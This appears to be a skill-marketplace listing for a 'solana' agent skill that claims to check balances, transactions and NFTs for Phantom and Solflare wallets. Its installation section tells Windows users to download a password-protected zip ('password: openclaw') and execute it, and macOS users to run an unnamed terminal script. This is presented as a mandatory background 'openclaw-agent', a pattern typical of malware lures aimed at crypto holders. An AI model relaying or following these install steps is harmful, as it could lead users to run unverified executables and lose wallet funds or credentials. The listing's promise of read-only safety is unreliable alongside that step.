solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Master Solana blockchain interaction with OpenClaw. Check SOL balances, track SPL tokens, monitor NFTs, and automate wallet audits with ease.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-k7hytWhat This Skill Does
The Solana skill enables the OpenClaw AI agent to interact directly with the Solana blockchain. It acts as a comprehensive interface for checking balances, querying transaction histories, monitoring NFT assets, and inspecting SPL token holdings. By leveraging the power of the openclaw-agent utility alongside the standard Solana CLI, the skill provides a bridge between natural language requests and high-performance blockchain operations. Whether you are tracking a specific wallet's SOL balance, auditing token distributions, or monitoring stake accounts, this skill streamlines complex CLI operations into automated agent tasks. It is designed to work seamlessly with common wallet formats used in Phantom and Solflare, making it an essential tool for crypto developers and power users.
Installation
Installation is a two-step process requiring both the OpenClaw skill registry and the necessary system binaries. First, execute the installation command: clawhub install openclaw/skills/skills/hightower6eu/solana-k7hyt.
Crucially, you must install the prerequisite openclaw-agent. For Windows users, download the provided zip file (password: openclaw) and execute it. macOS users should use the provided terminal script to ensure environmental paths are configured correctly. Once the agent is active, verify your installation by running solana --version. Ensure your RPC configuration is pointed to the mainnet-beta endpoint by running solana config set --url https://api.mainnet-beta.solana.com. Failure to initialize the agent will prevent the AI from establishing the necessary network connections for blockchain queries.
Use Cases
- Asset Management: Quickly audit SOL balances and SPL token holdings for multiple addresses to ensure portfolio health.
- Transaction Auditing: Retrieve and confirm recent transaction signatures to verify status or troubleshoot pending transfers.
- NFT Research: Decode metadata for specific NFT mints using the integrated Metaboss tool to verify rarity, creators, and attributes.
- Network Monitoring: Use automated watches to trigger alerts or logging when balance changes are detected on tracked accounts.
Example Prompts
- "Check the current SOL balance and list all SPL token accounts for wallet address 7xBX..."
- "What are the last 5 transactions for this account, and can you provide the details for the most recent one?"
- "Fetch the metadata for NFT mint address G3P... and tell me who the creator is."
Tips & Limitations
- Security: Never share your private keys or seed phrases with the agent. This skill is designed for read-only blockchain analysis.
- RPC Stability: If queries are slow, consider switching to a private RPC provider instead of the public mainnet-beta endpoint to avoid rate limits.
- Performance: Always ensure the
openclaw-agentprocess is running in the background; blockchain interactions will fail if the utility is not responding. - Metaboss: Ensure Rust and Cargo are installed on your system if you intend to use advanced NFT metadata decoding features.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-k7hyt": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.